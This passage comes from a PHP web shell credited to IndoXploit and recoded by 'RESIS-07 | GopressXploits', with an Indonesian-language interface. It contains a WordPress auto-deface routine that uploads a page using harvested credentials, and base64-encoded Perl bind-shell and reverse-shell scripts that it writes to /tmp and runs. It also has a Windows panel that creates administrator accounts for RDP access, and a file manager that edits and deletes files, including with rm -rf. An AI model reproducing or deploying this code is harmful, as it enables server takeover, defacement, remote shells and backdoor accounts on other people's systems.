2165. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2166. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2167. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2168. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2169. $data3 = curl_exec($ch);
2170. curl_close($ch);
2171. $y = date("Y");
2172. $m = date("m");
2173. $namafile = "id.php";
2174. $fpi = fopen($namafile,"w");
2175. fputs($fpi,$script);
2176. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2177. curl_setopt($ch6, CURLOPT_POST, true);
2178. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2179. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2180. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2181. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2182. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
2183. $postResult = curl_exec($ch6);
2184. curl_close($ch6);
2185. $as = "$target/k.php";
2186. $bs = anucurl($as);
2187. if(preg_match("#$script#is", $bs)) {
2188. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
2189. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2190. } else {
2191. echo "[-] <font color='red'>gagal mepes...</font><br>";
2192. echo "[!!] coba aja manual: <br>";
2193. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2194. echo "[+] username: <font color=Yellow>$user</font><br>";
2195. echo "[+] password: <font color=Yellow>$pass</font><br><br>";
2196. }
2197. mysql_close($conn);
2198. }
2199. }
2200. } else {
2201. echo "<center><h1>WordPress Auto Deface V.2</h1>
2202. <form method='post'>
2203. Link Config: <br>
2204. <textarea name='link' placeholder='http://target.com/takanashi_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
2205. <input type='text' name='script' height='10' size='50' placeholder='Hacked by RESIS-07 | GopressXploits' required><br>
2206. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2207. </form></center>";
2208. }
2209. } elseif($_GET['do'] == 'network') {
2210. echo "<form method='post'>
2211. <u>Bind Port:</u> <br>
2212. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
2213. <input type='submit' name='sub_bp' value='>>'>
2214. </form>
2215. <form method='post'>
2216. <u>Back Connect:</u> <br>
2217. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
2218. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
2219. <input type='submit' name='sub_bc' value='>>'>
2220. </form>";
2221. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
2222. if(isset($_POST['sub_bp'])) {
2223. $f_bp = fopen("/tmp/bp.pl", "w");
2224. fwrite($f_bp, base64_decode($bind_port_p));
2225. fclose($f_bp);
2226.  
2227. $port = $_POST['port_bind'];
2228. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
2229. sleep(1);
2230. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
2231. unlink("/tmp/bp.pl");
2232. }
2233. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
2234. if(isset($_POST['sub_bc'])) {
2235. $f_bc = fopen("/tmp/bc.pl", "w");
2236. fwrite($f_bc, base64_decode($bind_connect_p));
2237. fclose($f_bc);
2238.  
2239. $ipbc = $_POST['ip_bc'];
2240. $port = $_POST['port_bc'];
2241. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
2242. sleep(1);
2243. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
2244. unlink("/tmp/bc.pl");
2245. }
2246. } elseif($_GET['do'] == 'krdp_shell') {
2247. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
2248. if($_POST['create']) {
2249. $user = htmlspecialchars($_POST['user']);
2250. $pass = htmlspecialchars($_POST['pass']);
2251. if(preg_match("/$user/", exe("net user"))) {
2252. echo "[INFO] -> <font color=red>user <font color=Yellow>$user</font> sudah ada</font>";
2253. } else {
2254. $add_user = exe("net user $user $pass /add");
2255. $add_groups1 = exe("net localgroup Administrators $user /add");
2256. $add_groups2 = exe("net localgroup Administrator $user /add");
2257. $add_groups3 = exe("net localgroup Administrateur $user /add");
2258. echo "[ RDP ACCOUNT INFO ]<br>
2259. ------------------------------<br>
2260. IP: <font color=Yellow>".$ip."</font><br>
2261. Username: <font color=Yellow>$user</font><br>
2262. Password: <font color=Yellow>$pass</font><br>
2263. ------------------------------<br><br>
2264. [ STATUS ]<br>
2265. ------------------------------<br>
2266. ";
2267. if($add_user) {
2268. echo "[add user] -> <font color='Yellow'>Berhasil</font><br>";
2269. } else {
2270. echo "[add user] -> <font color='red'>Gagal</font><br>";
2271. }
2272. if($add_groups1) {
2273. echo "[add localgroup Administrators] -> <font color='Yellow'>Berhasil</font><br>";
2274. } elseif($add_groups2) {
2275. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
2276. } elseif($add_groups3) {
2277. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
2278. } else {
2279. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
2280. }
2281. echo "------------------------------<br>";
2282. }
2283. } elseif($_POST['s_opsi']) {
2284. $user = htmlspecialchars($_POST['r_user']);
2285. if($_POST['opsi'] == '1') {
2286. $cek = exe("net user $user");
2287. echo "Checking username <font color=Yellow>$user</font> ....... ";
2288. if(preg_match("/$user/", $cek)) {
2289. echo "[ <font color=Yellow>Sudah ada</font> ]<br>
2290. ------------------------------<br><br>
2291. <pre>$cek</pre>";
2292. } else {
2293. echo "[ <font color=red>belum ada</font> ]";
2294. }
2295. } elseif($_POST['opsi'] == '2') {
2296. $cek = exe("net user $user gandatamvan");
2297. if(preg_match("/$user/", exe("net user"))) {
2298. echo "[change password: <font color=Yellow>gandatamvan</font>] -> ";
2299. if($cek) {
2300. echo "<font color=Yellow>Berhasil</font>";
2301. } else {
2302. echo "<font color=red>Gagal</font>";
2303. }
2304. } else {
2305. echo "[INFO] -> <font color=red>user <font color=Yellow>$user</font> belum ada</font>";
2306. }
2307. } elseif($_POST['opsi'] == '3') {
2308. $cek = exe("net user $user /DELETE");
2309. if(preg_match("/$user/", exe("net user"))) {
2310. echo "[remove user: <font color=Yellow>$user</font>] -> ";
2311. if($cek) {
2312. echo "<font color=Yellow>Berhasil</font>";
2313. } else {
2314. echo "<font color=red>Gagal</font>";
2315. }
2316. } else {
2317. echo "[INFO] -> <font color=red>user <font color=Yellow>$user</font> belum ada</font>";
2318. }
2319. } else {
2320. //
2321. }
2322. } else {
2323. echo "-- Create RDP --<br>
2324. <form method='post'>
2325. <input type='text' name='user' placeholder='username' value='gandatamvan' required>
2326. <input type='text' name='pass' placeholder='password' value='gandatamvan' required>
2327. <input type='submit' name='create' value='>>'>
2328. </form>
2329. -- Option --<br>
2330. <form method='post'>
2331. <input type='text' name='r_user' placeholder='username' required>
2332. <select name='opsi'>
2333. <option value='1'>Cek Username</option>
2334. <option value='2'>Ubah Password</option>
2335. <option value='3'>Hapus Username</option>
2336. </select>
2337. <input type='submit' name='s_opsi' value='>>'>
2338. </form>
2339. ";
2340. }
2341. } else {
2342. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
2343. }
2344. } elseif($_GET['act'] == 'newfile') {
2345. if($_POST['new_save_file']) {
2346. $newfile = htmlspecialchars($_POST['newfile']);
2347. $fopen = fopen($newfile, "a+");
2348. if($fopen) {
2349. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
2350. } else {
2351. $act = "<font color=red>permission denied</font>";
2352. }
2353. }
2354. echo $act;
2355. echo "<form method='post'>
2356. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
2357. <input type='submit' name='new_save_file' value='Submit'>
2358. </form>";
2359. } elseif($_GET['act'] == 'newfolder') {
2360. if($_POST['new_save_folder']) {
2361. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
2362. if(!mkdir($new_folder)) {
2363. $act = "<font color=red>permission denied</font>";
2364. } else {
2365. $act = "<script>window.location='?dir=".$dir."';</script>";
2366. }
2367. }
2368. echo $act;
2369. echo "<form method='post'>
2370. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
2371. <input type='submit' name='new_save_folder' value='Submit'>
2372. </form>";
2373. } elseif($_GET['act'] == 'rename_dir') {
2374. if($_POST['dir_rename']) {
2375. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2376. if($dir_rename) {
2377. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2378. } else {
2379. $act = "<font color=red>permission denied</font>";
2380. }
2381. echo "".$act."<br>";
2382. }
2383. echo "<form method='post'>
2384. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
2385. <input type='submit' name='dir_rename' value='rename'>
2386. </form>";
2387. } elseif($_GET['act'] == 'delete_dir') {
2388. if(is_dir($dir)) {
2389. if(is_writable($dir)) {
2390. @rmdir($dir);
2391. @exe("rm -rf $dir");
2392. @exe("rmdir /s /q $dir");
2393. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2394. } else {
2395. $act = "<font color=red>could not remove ".basename($dir)."</font>";
2396. }
2397. }
2398. echo $act;
2399. } elseif($_GET['act'] == 'view') {
2400. echo "Filename: <font color=Yellow>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2401. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
2402. } elseif($_GET['act'] == 'edit') {
2403. if($_POST['save']) {
2404. $save = file_put_contents($_GET['file'], $_POST['src']);
2405. if($save) {
2406. $act = "<font color=Yellow>Saved!</font>";
2407. } else {
2408. $act = "<font color=red>permission denied</font>";
2409. }
2410. echo "".$act."<br>";
2411. }
2412. echo "Filename: <font color=Yellow>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2413. echo "<form method='post'>
2414. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
2415. <input type='submit' value='Save' name='save' style='width: 500px;'>
2416. </form>";
2417. } elseif($_GET['act'] == 'rename') {
2418. if($_POST['do_rename']) {
2419. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
2420. if($rename) {
2421. $act = "<script>window.location='?dir=".$dir."';</script>";
2422. } else {
2423. $act = "<font color=red>permission denied</font>";
2424. }
2425. echo "".$act."<br>";
2426. }
2427. echo "Filename: <font color=Yellow>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2428. echo "<form method='post'>
2429. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
2430. <input type='submit' name='do_rename' value='rename'>
2431. </form>";
2432. } elseif($_GET['act'] == 'delete') {
2433. $delete = unlink($_GET['file']);
2434. if($delete) {
2435. $act = "<script>window.location='?dir=".$dir."';</script>";
2436. } else {
2437. $act = "<font color=red>permission denied</font>";
2438. }
2439. echo $act;
2440. } else {
2441. if(is_dir($dir) === true) {
2442. if(!is_readable($dir)) {
2443. echo "<font color=red>can't open directory. ( not readable )</font>";
2444. } else {
2445. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
2446. <tr>
2447. <th class="th_home"><center>Name</center></th>
2448. <th class="th_home"><center>Type</center></th>
2449. <th class="th_home"><center>Size</center></th>
2450. <th class="th_home"><center>Last Modified</center></th>
2451. <th class="th_home"><center>Owner/Group</center></th>
2452. <th class="th_home"><center>Permission</center></th>
2453. <th class="th_home"><center>Action</center></th>
2454. </tr>';
2455. $scandir = scandir($dir);
2456. foreach($scandir as $dirx) {
2457. $dtype = filetype("$dir/$dirx");
2458. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
2459. if(function_exists('posix_getpwuid')) {
2460. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
2461. $downer = $downer['name'];
2462. } else {
2463. //$downer = $uid;
2464. $downer = fileowner("$dir/$dirx");
2465. }
2466. if(function_exists('posix_getgrgid')) {
2467. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
2468. $dgrp = $dgrp['name'];
2469. } else {
2470. $dgrp = filegroup("$dir/$dirx");
2471. }
2472. if(!is_dir("$dir/$dirx")) continue;
2473. if($dirx === '..') {
2474. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
2475. } elseif($dirx === '.') {
2476. $href = "<a href='?dir=$dir'>$dirx</a>";
2477. } else {
2478. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
2479. }
2480. if($dirx === '.' || $dirx === '..') {
2481. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
2482. } else {
2483. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
2484. }
2485. echo "<tr>";
2486. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
2487. echo "<td class='td_home'><center>$dtype</center></td>";
2488. echo "<td class='td_home'><center>-</center></th></td>";
2489. echo "<td class='td_home'><center>$dtime</center></td>";
2490. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
2491. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
2492. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
2493. echo "</tr>";
2494. }
2495. }
2496. } else {
2497. echo "<font color=red>can't open directory.</font>";
2498. }
2499. foreach($scandir as $file) {
2500. $ftype = filetype("$dir/$file");
2501. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2502. $size = filesize("$dir/$file")/1024;
2503. $size = round($size,3);
2504. if(function_exists('posix_getpwuid')) {
2505. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2506. $fowner = $fowner['name'];
2507. } else {
2508. //$downer = $uid;
2509. $fowner = fileowner("$dir/$file");
2510. }
2511. if(function_exists('posix_getgrgid')) {
2512. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2513. $fgrp = $fgrp['name'];
2514. } else {
2515. $fgrp = filegroup("$dir/$file");
2516. }
2517. if($size > 1024) {
2518. $size = round($size/1024,2). 'MB';
2519. } else {
2520. $size = $size. 'KB';
2521. }
2522. if(!is_file("$dir/$file")) continue;
2523. echo "<tr>";
2524. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
2525. echo "<td class='td_home'><center>$ftype</center></td>";
2526. echo "<td class='td_home'><center>$size</center></td>";
2527. echo "<td class='td_home'><center>$ftime</center></td>";
2528. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
2529. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2530. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
2531. echo "</tr>";
2532. }
2533. echo "</table>";
2534. if(!is_readable($dir)) {
2535. //
2536. } else {
2537. echo "<hr>";
2538. }
2539. echo "<center>Recoded By - <font color=Yellow> <a href='https://www.facebook.com/padang.edu.id' target='_blank'>RESIS-07 | <a href='http://www.gopressxploits.org' target='_blank'>GopressXploits</font></a></center>";
2540. echo "<center>Copyright &copy; ".date("Y")." - <font color=Yellow>IndoXploit</font></a></center>";
2541. }
2542. ?>
2543. </html>